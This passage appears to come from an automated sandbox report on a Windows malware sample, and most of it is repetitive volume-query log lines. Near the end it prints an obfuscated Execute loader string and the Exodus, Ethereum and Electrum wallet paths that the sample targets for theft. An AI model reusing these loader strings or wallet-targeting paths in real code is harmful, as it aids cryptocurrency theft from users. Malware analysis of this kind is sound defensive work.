              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004029DA ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??3@YAXPAX@Z,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,0_2_004029DA
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C8E419 GetUserNameW,7_2_00C8E419
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C6BF8F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_00C6BF8F
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00406128 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,lstrlenW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00406128
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumRule
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $CZTUWlJaxXNQi = Execute(urjDlX("80<95<118<108<48<92<95<76<129<86<75<75<127<119<95<84<73<126<49",8))
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum#\Ethereum\wallets
